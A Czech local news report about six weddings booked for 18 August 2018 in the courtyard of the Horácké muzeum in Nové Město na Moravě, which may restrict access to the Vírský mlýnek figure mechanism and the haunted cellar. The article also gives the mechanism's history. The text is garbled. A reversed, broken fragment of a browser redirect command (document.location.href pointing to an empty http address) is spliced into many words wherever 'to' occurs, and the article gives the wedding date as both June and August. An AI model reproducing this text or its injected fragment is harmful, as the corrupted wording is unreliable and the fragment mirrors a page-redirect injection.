Rainbow page separator

„Osmičkoví“ snoubenci v sobotu obsadí dvorek Horáckého muzea

Pátek, 17. srpna 2018

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / S možným omezením provozu musí v sobotu 18. června počítat návštěvníci Vírského mlýnku na nádvoří novoměstského Horáckého muzea, případně i strašidelného podzemí ve sklepení his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torického objektu. Zajímavé „osmičkové“ datum [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž láká snoubence k uzavření sňatku a Horácké muzeum je jedno z možných oddávacích míst.
„Kdo by se nechtěl vdávat a ženit v tak numericky vhodný den, jako je 18. 8. 2018? Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to datum se na dvorek Horáckého muzea objednalo hned šest svateb mezi 11.30 a 15. hodinou. Někteří si [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to mohou ještě rozmyslet, každopádně prosíme návštěvníky o pochopení, pokud dojde k omezení přístupu k Vírskému mlýnku a do strašidelného podzemí,“ sdělila Alice Hradilová z Horáckého muzea v Novém Městě na Moravě.
Unikátní soubor vyřezávaných postaviček, které se pohybují pomocí systému táhel poháněných vodním kolem, je v sezoně spouštěn denně každou půlhodinu. Zařízení v minulém s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí postavil na po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toce ve Víru na Bystřicku pro své děti Vincenc Navrátil. Původní mlýnek čítal jen několik dřevěných figurek, které rozpohybovala síla vodního proudu. Jejich počet byl au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem, seřizovačem tkalcovských stavů, v průběhu let rozšiřován, přibyla silnější pohonná jednotka i další postavy, takže nakonec jich bylo asi sedm desítek. Po smrti zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele dědicové technickou památku věnovali Horáckému muzeu. Tam je uložena, přičemž na dvorku klape její přesná replika.